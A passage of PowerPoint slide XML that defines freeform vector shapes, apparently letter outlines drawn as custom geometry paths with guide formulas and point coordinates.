                <a:gd name="T12" fmla="*/ 23 w 135"/>
                <a:gd name="T13" fmla="*/ 17 h 119"/>
                <a:gd name="T14" fmla="*/ 23 w 135"/>
                <a:gd name="T15" fmla="*/ 17 h 119"/>
                <a:gd name="T16" fmla="*/ 57 w 135"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 78 w 135"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 111 w 135"/>
                <a:gd name="T21" fmla="*/ 17 h 119"/>
                <a:gd name="T22" fmla="*/ 111 w 135"/>
                <a:gd name="T23" fmla="*/ 17 h 119"/>
                <a:gd name="T24" fmla="*/ 111 w 135"/>
                <a:gd name="T25" fmla="*/ 119 h 119"/>
                <a:gd name="T26" fmla="*/ 135 w 135"/>
                <a:gd name="T27" fmla="*/ 119 h 119"/>
                <a:gd name="T28" fmla="*/ 135 w 135"/>
                <a:gd name="T29" fmla="*/ 0 h 119"/>
                <a:gd name="T30" fmla="*/ 94 w 135"/>
                <a:gd name="T31" fmla="*/ 0 h 119"/>
                <a:gd name="T32" fmla="*/ 68 w 135"/>
                <a:gd name="T33" fmla="*/ 8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19">
                  <a:moveTo>
                    <a:pt x="68" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66" y="85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23" y="119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57" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6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ŝľíďe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5526251" y="3756463"/>
              <a:ext cx="35447" cy="1622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ṡľidé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5601235" y="3756463"/>
              <a:ext cx="144514" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 83 w 106"/>
                <a:gd name="T1" fmla="*/ 93 h 119"/>
                <a:gd name="T2" fmla="*/ 83 w 106"/>
                <a:gd name="T3" fmla="*/ 93 h 119"/>
                <a:gd name="T4" fmla="*/ 38 w 106"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 106"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 0 w 106"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 23 w 106"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 23 w 106"/>
                <a:gd name="T13" fmla="*/ 19 h 119"/>
                <a:gd name="T14" fmla="*/ 23 w 106"/>
                <a:gd name="T15" fmla="*/ 19 h 119"/>
                <a:gd name="T16" fmla="*/ 71 w 106"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 106 w 106"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 106 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 119"/>
                <a:gd name="T22" fmla="*/ 83 w 106"/>
                <a:gd name="T23" fmla="*/ 0 h 119"/>
                <a:gd name="T24" fmla="*/ 83 w 106"/>
                <a:gd name="T25" fmla="*/ 9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119">
                  <a:moveTo>
                    <a:pt x="83" y="93"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83" y="93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23" y="1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71" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8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śļíḋe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5778469" y="3756463"/>
              <a:ext cx="125427" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 90 w 92"/>
                <a:gd name="T1" fmla="*/ 19 h 119"/>
                <a:gd name="T2" fmla="*/ 90 w 92"/>
                <a:gd name="T3" fmla="*/ 0 h 119"/>
                <a:gd name="T4" fmla="*/ 5 w 92"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 5 w 92"/>
                <a:gd name="T7" fmla="*/ 19 h 119"/>
                <a:gd name="T8" fmla="*/ 59 w 92"/>
                <a:gd name="T9" fmla="*/ 19 h 119"/>
                <a:gd name="T10" fmla="*/ 0 w 92"/>
                <a:gd name="T11" fmla="*/ 97 h 119"/>
                <a:gd name="T12" fmla="*/ 0 w 92"/>
                <a:gd name="T13" fmla="*/ 119 h 119"/>
                <a:gd name="T14" fmla="*/ 92 w 92"/>
                <a:gd name="T15" fmla="*/ 119 h 119"/>
                <a:gd name="T16" fmla="*/ 92 w 92"/>
                <a:gd name="T17" fmla="*/ 97 h 119"/>
                <a:gd name="T18" fmla="*/ 33 w 92"/>
                <a:gd name="T19" fmla="*/ 97 h 119"/>
                <a:gd name="T20" fmla="*/ 90 w 92"/>
                <a:gd name="T21" fmla="*/ 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19">
                  <a:moveTo>
                    <a:pt x="90" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9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ṣ1ïḑé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5939343" y="3756463"/>
              <a:ext cx="139061" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 43"/>
                <a:gd name="T1" fmla="*/ 27 h 50"/>
                <a:gd name="T2" fmla="*/ 30 w 43"/>
                <a:gd name="T3" fmla="*/ 39 h 50"/>
                <a:gd name="T4" fmla="*/ 22 w 43"/>
                <a:gd name="T5" fmla="*/ 43 h 50"/>
                <a:gd name="T6" fmla="*/ 13 w 43"/>
                <a:gd name="T7" fmla="*/ 39 h 50"/>
                <a:gd name="T8" fmla="*/ 11 w 43"/>
                <a:gd name="T9" fmla="*/ 27 h 50"/>
                <a:gd name="T10" fmla="*/ 11 w 43"/>
                <a:gd name="T11" fmla="*/ 0 h 50"/>
                <a:gd name="T12" fmla="*/ 0 w 43"/>
                <a:gd name="T13" fmla="*/ 0 h 50"/>
                <a:gd name="T14" fmla="*/ 0 w 43"/>
                <a:gd name="T15" fmla="*/ 31 h 50"/>
                <a:gd name="T16" fmla="*/ 22 w 43"/>
                <a:gd name="T17" fmla="*/ 50 h 50"/>
                <a:gd name="T18" fmla="*/ 43 w 43"/>
                <a:gd name="T19" fmla="*/ 31 h 50"/>
                <a:gd name="T20" fmla="*/ 43 w 43"/>
                <a:gd name="T21" fmla="*/ 0 h 50"/>
                <a:gd name="T22" fmla="*/ 33 w 43"/>
                <a:gd name="T23" fmla="*/ 0 h 50"/>
                <a:gd name="T24" fmla="*/ 33 w 43"/>
                <a:gd name="T2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50">
                  <a:moveTo>
                    <a:pt x="33" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="33"/>
                    <a:pt x="32" y="37"/>
                    <a:pt x="30" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="42"/>
                    <a:pt x="26" y="43"/>
                    <a:pt x="22" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="43"/>
                    <a:pt x="15" y="42"/>
                    <a:pt x="13" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="37"/>
                    <a:pt x="10" y="33"/>
                    <a:pt x="11" y="27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44"/>
                    <a:pt x="7" y="50"/>
                    <a:pt x="22" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="50"/>
                    <a:pt x="43" y="44"/>
                    <a:pt x="43" y="31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íṧḷíďè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6175202" y="3756463"/>
              <a:ext cx="141788" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 44"/>
                <a:gd name="T1" fmla="*/ 27 h 50"/>
                <a:gd name="T2" fmla="*/ 31 w 44"/>
                <a:gd name="T3" fmla="*/ 39 h 50"/>
                <a:gd name="T4" fmla="*/ 22 w 44"/>
                <a:gd name="T5" fmla="*/ 43 h 50"/>
                <a:gd name="T6" fmla="*/ 13 w 44"/>
                <a:gd name="T7" fmla="*/ 39 h 50"/>
                <a:gd name="T8" fmla="*/ 11 w 44"/>
                <a:gd name="T9" fmla="*/ 27 h 50"/>
                <a:gd name="T10" fmla="*/ 11 w 44"/>
                <a:gd name="T11" fmla="*/ 0 h 50"/>
                <a:gd name="T12" fmla="*/ 0 w 44"/>
                <a:gd name="T13" fmla="*/ 0 h 50"/>
                <a:gd name="T14" fmla="*/ 0 w 44"/>
                <a:gd name="T15" fmla="*/ 31 h 50"/>
                <a:gd name="T16" fmla="*/ 22 w 44"/>
                <a:gd name="T17" fmla="*/ 50 h 50"/>
                <a:gd name="T18" fmla="*/ 44 w 44"/>
                <a:gd name="T19" fmla="*/ 31 h 50"/>
                <a:gd name="T20" fmla="*/ 44 w 44"/>
                <a:gd name="T21" fmla="*/ 0 h 50"/>
                <a:gd name="T22" fmla="*/ 33 w 44"/>
                <a:gd name="T23" fmla="*/ 0 h 50"/>
                <a:gd name="T24" fmla="*/ 33 w 44"/>
                <a:gd name="T2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50">
                  <a:moveTo>
                    <a:pt x="33" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="33"/>
                    <a:pt x="32" y="37"/>
                    <a:pt x="31" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="42"/>
                    <a:pt x="26" y="43"/>
                    <a:pt x="22" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="43"/>
                    <a:pt x="15" y="42"/>
                    <a:pt x="13" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="37"/>
                    <a:pt x="11" y="33"/>
                    <a:pt x="11" y="27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44"/>
                    <a:pt x="8" y="50"/>
                    <a:pt x="22" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="50"/>
                    <a:pt x="43" y="44"/>
                    <a:pt x="44" y="31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$1iḓê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6359253" y="3756463"/>
              <a:ext cx="148604" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 85 w 109"/>
                <a:gd name="T1" fmla="*/ 93 h 119"/>
                <a:gd name="T2" fmla="*/ 83 w 109"/>
                <a:gd name="T3" fmla="*/ 93 h 119"/>
                <a:gd name="T4" fmla="*/ 38 w 109"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 109"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 0 w 109"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 23 w 109"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 23 w 109"/>
                <a:gd name="T13" fmla="*/ 19 h 119"/>
                <a:gd name="T14" fmla="*/ 26 w 109"/>
                <a:gd name="T15" fmla="*/ 19 h 119"/>
                <a:gd name="T16" fmla="*/ 71 w 109"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 109 w 109"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 109 w 109"/>
                <a:gd name="T21" fmla="*/ 0 h 119"/>
                <a:gd name="T22" fmla="*/ 85 w 109"/>
                <a:gd name="T23" fmla="*/ 0 h 119"/>
                <a:gd name="T24" fmla="*/ 85 w 109"/>
                <a:gd name="T25" fmla="*/ 9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19">
                  <a:moveTo>
                    <a:pt x="85" y="93"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83" y="93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23" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85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ṩḻïḍê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6546030" y="3756463"/>
              <a:ext cx="35447" cy="1622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Sliḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6610107" y="3756463"/>
              <a:ext cx="155421" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 59 w 114"/>
                <a:gd name="T1" fmla="*/ 93 h 119"/>
                <a:gd name="T2" fmla="*/ 57 w 114"/>
                <a:gd name="T3" fmla="*/ 93 h 119"/>
                <a:gd name="T4" fmla="*/ 26 w 114"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 114"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 43 w 114"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 71 w 114"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
                <a:gd name="T12" fmla="*/ 114 w 114"/>
                <a:gd name="T13" fmla="*/ 0 h 119"/>
                <a:gd name="T14" fmla="*/ 90 w 114"/>
                <a:gd name="T15" fmla="*/ 0 h 119"/>
                <a:gd name="T16" fmla="*/ 59 w 114"/>
                <a:gd name="T17" fmla="*/ 9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19">
                  <a:moveTo>
                    <a:pt x="59" y="93"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59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ṥļïde"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6794159" y="3756463"/>
              <a:ext cx="110431" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 81"/>
                <a:gd name="T1" fmla="*/ 66 h 119"/>
                <a:gd name="T2" fmla="*/ 76 w 81"/>
                <a:gd name="T3" fmla="*/ 66 h 119"/>
                <a:gd name="T4" fmla="*/ 76 w 81"/>
                <a:gd name="T5" fmla="*/ 47 h 119"/>
                <a:gd name="T6" fmla="*/ 26 w 81"/>
                <a:gd name="T7" fmla="*/ 47 h 119"/>
                <a:gd name="T8" fmla="*/ 26 w 81"/>
                <a:gd name="T9" fmla="*/ 19 h 119"/>
                <a:gd name="T10" fmla="*/ 78 w 81"/>
                <a:gd name="T11" fmla="*/ 19 h 119"/>
                <a:gd name="T12" fmla="*/ 78 w 81"/>
                <a:gd name="T13" fmla="*/ 0 h 119"/>
                <a:gd name="T14" fmla="*/ 0 w 81"/>
                <a:gd name="T15" fmla="*/ 0 h 119"/>
                <a:gd name="T16" fmla="*/ 0 w 81"/>
                <a:gd name="T17" fmla="*/ 119 h 119"/>
                <a:gd name="T18" fmla="*/ 81 w 81"/>
                <a:gd name="T19" fmla="*/ 119 h 119"/>
                <a:gd name="T20" fmla="*/ 81 w 81"/>
                <a:gd name="T21" fmla="*/ 97 h 119"/>
                <a:gd name="T22" fmla="*/ 26 w 81"/>
                <a:gd name="T23" fmla="*/ 97 h 119"/>
                <a:gd name="T24" fmla="*/ 26 w 81"/>
                <a:gd name="T25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119">
                  <a:moveTo>
                    <a:pt x="26" y="66"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78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81" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26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ś1ïďe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6942763" y="3756463"/>
              <a:ext cx="129517" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 37 w 40"/>
                <a:gd name="T1" fmla="*/ 36 h 50"/>
                <a:gd name="T2" fmla="*/ 28 w 40"/>
                <a:gd name="T3" fmla="*/ 25 h 50"/>
                <a:gd name="T4" fmla="*/ 28 w 40"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 39 w 40"/>
                <a:gd name="T7" fmla="*/ 13 h 50"/>
                <a:gd name="T8" fmla="*/ 21 w 40"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 0 w 40"/>
                <a:gd name="T11" fmla="*/ 0 h 50"/>
                <a:gd name="T12" fmla="*/ 0 w 40"/>
                <a:gd name="T13" fmla="*/ 50 h 50"/>
                <a:gd name="T14" fmla="*/ 11 w 40"/>
                <a:gd name="T15" fmla="*/ 50 h 50"/>
                <a:gd name="T16" fmla="*/ 11 w 40"/>
                <a:gd name="T17" fmla="*/ 30 h 50"/>
                <a:gd name="T18" fmla="*/ 22 w 40"/>
                <a:gd name="T19" fmla="*/ 30 h 50"/>
                <a:gd name="T20" fmla="*/ 27 w 40"/>
                <a:gd name="T21" fmla="*/ 36 h 50"/>
                <a:gd name="T22" fmla="*/ 29 w 40"/>
                <a:gd name="T23" fmla="*/ 50 h 50"/>
                <a:gd name="T24" fmla="*/ 40 w 40"/>
                <a:gd name="T25" fmla="*/ 50 h 50"/>
                <a:gd name="T26" fmla="*/ 38 w 40"/>
                <a:gd name="T27" fmla="*/ 38 h 50"/>
                <a:gd name="T28" fmla="*/ 37 w 40"/>
                <a:gd name="T29" fmla="*/ 36 h 50"/>
                <a:gd name="T30" fmla="*/ 20 w 40"/>
                <a:gd name="T31" fmla="*/ 21 h 50"/>
                <a:gd name="T32" fmla="*/ 11 w 40"/>
                <a:gd name="T33" fmla="*/ 21 h 50"/>
                <a:gd name="T34" fmla="*/ 11 w 40"/>
                <a:gd name="T35" fmla="*/ 8 h 50"/>
                <a:gd name="T36" fmla="*/ 20 w 40"/>
                <a:gd name="T37" fmla="*/ 8 h 50"/>
                <a:gd name="T38" fmla="*/ 27 w 40"/>
                <a:gd name="T39" fmla="*/ 14 h 50"/>
                <a:gd name="T40" fmla="*/ 20 w 40"/>
                <a:gd name="T41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50">
                  <a:moveTo>
                    <a:pt x="37" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="29"/>
                    <a:pt x="34" y="25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5" y="23"/>
                    <a:pt x="39" y="19"/>
                    <a:pt x="39" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="4"/>
                    <a:pt x="33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5" y="30"/>
                    <a:pt x="26" y="32"/>
                    <a:pt x="27" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="41"/>
                    <a:pt x="28" y="46"/>
                    <a:pt x="29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9" y="48"/>
                    <a:pt x="38" y="44"/>
                    <a:pt x="38" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="38"/>
                    <a:pt x="38" y="37"/>
                    <a:pt x="37" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20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5" y="8"/>
                    <a:pt x="27" y="10"/>
                    <a:pt x="27" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="19"/>
                    <a:pt x="25" y="21"/>
                    <a:pt x="2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ṣľïďê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7098184" y="3753737"/>
              <a:ext cx="132244" cy="164964"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 24 w 41"/>
                <a:gd name="T1" fmla="*/ 21 h 51"/>
                <a:gd name="T2" fmla="*/ 22 w 41"/>
                <a:gd name="T3" fmla="*/ 21 h 51"/>
                <a:gd name="T4" fmla="*/ 13 w 41"/>
                <a:gd name="T5" fmla="*/ 14 h 51"/>
                <a:gd name="T6" fmla="*/ 21 w 41"/>
                <a:gd name="T7" fmla="*/ 7 h 51"/>
                <a:gd name="T8" fmla="*/ 29 w 41"/>
                <a:gd name="T9" fmla="*/ 15 h 51"/>
                <a:gd name="T10" fmla="*/ 40 w 41"/>
                <a:gd name="T11" fmla="*/ 15 h 51"/>
                <a:gd name="T12" fmla="*/ 23 w 41"/>
                <a:gd name="T13" fmla="*/ 0 h 51"/>
                <a:gd name="T14" fmla="*/ 2 w 41"/>
                <a:gd name="T15" fmla="*/ 16 h 51"/>
                <a:gd name="T16" fmla="*/ 18 w 41"/>
                <a:gd name="T17" fmla="*/ 30 h 51"/>
                <a:gd name="T18" fmla="*/ 20 w 41"/>
                <a:gd name="T19" fmla="*/ 30 h 51"/>
                <a:gd name="T20" fmla="*/ 30 w 41"/>
                <a:gd name="T21" fmla="*/ 38 h 51"/>
                <a:gd name="T22" fmla="*/ 20 w 41"/>
                <a:gd name="T23" fmla="*/ 44 h 51"/>
                <a:gd name="T24" fmla="*/ 11 w 41"/>
                <a:gd name="T25" fmla="*/ 35 h 51"/>
                <a:gd name="T26" fmla="*/ 0 w 41"/>
                <a:gd name="T27" fmla="*/ 35 h 51"/>
                <a:gd name="T28" fmla="*/ 20 w 41"/>
                <a:gd name="T29" fmla="*/ 51 h 51"/>
                <a:gd name="T30" fmla="*/ 41 w 41"/>
                <a:gd name="T31" fmla="*/ 35 h 51"/>
                <a:gd name="T32" fmla="*/ 24 w 41"/>
                <a:gd name="T33" fmla="*/ 2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51">
                  <a:moveTo>
                    <a:pt x="24" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="21"/>
                    <a:pt x="22" y="21"/>
                    <a:pt x="22" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="20"/>
                    <a:pt x="13" y="18"/>
                    <a:pt x="13" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="10"/>
                    <a:pt x="16" y="8"/>
                    <a:pt x="21" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="7"/>
                    <a:pt x="29" y="10"/>
                    <a:pt x="29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5"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="2" y="6"/>
                    <a:pt x="2" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="23"/>
                    <a:pt x="7" y="27"/>
                    <a:pt x="18" y="30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6" y="32"/>
                    <a:pt x="30" y="34"/>
                    <a:pt x="30" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="42"/>
                    <a:pt x="26" y="44"/>
                    <a:pt x="20" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="44"/>
                    <a:pt x="11" y="41"/>
                    <a:pt x="11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6"/>
                    <a:pt x="7" y="51"/>
                    <a:pt x="20" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="51"/>
                    <a:pt x="41" y="46"/>
                    <a:pt x="41" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="28"/>
                    <a:pt x="35" y="24"/>
                    <a:pt x="2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sļïḋé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7265875" y="3756463"/>
              <a:ext cx="35447" cy="1622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şliḋé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7329952" y="3756463"/>
              <a:ext cx="132244" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 97"/>
                <a:gd name="T1" fmla="*/ 19 h 119"/>
                <a:gd name="T2" fmla="*/ 35 w 97"/>
                <a:gd name="T3" fmla="*/ 19 h 119"/>
                <a:gd name="T4" fmla="*/ 35 w 97"/>
                <a:gd name="T5" fmla="*/ 119 h 119"/>
                <a:gd name="T6" fmla="*/ 61 w 97"/>
                <a:gd name="T7" fmla="*/ 119 h 119"/>
                <a:gd name="T8" fmla="*/ 61 w 97"/>
                <a:gd name="T9" fmla="*/ 19 h 119"/>
                <a:gd name="T10" fmla="*/ 97 w 97"/>
                <a:gd name="T11" fmla="*/ 19 h 119"/>
                <a:gd name="T12" fmla="*/ 97 w 97"/>
                <a:gd name="T13" fmla="*/ 0 h 119"/>
                <a:gd name="T14" fmla="*/ 0 w 97"/>
                <a:gd name="T15" fmla="*/ 0 h 119"/>
                <a:gd name="T16" fmla="*/ 0 w 97"/>
                <a:gd name="T17" fmla="*/ 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119">
                  <a:moveTo>
                    <a:pt x="0" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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ślíḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7478556" y="3756463"/>
              <a:ext cx="144514" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 106"/>
                <a:gd name="T1" fmla="*/ 55 h 119"/>
                <a:gd name="T2" fmla="*/ 30 w 106"/>
                <a:gd name="T3" fmla="*/ 0 h 119"/>
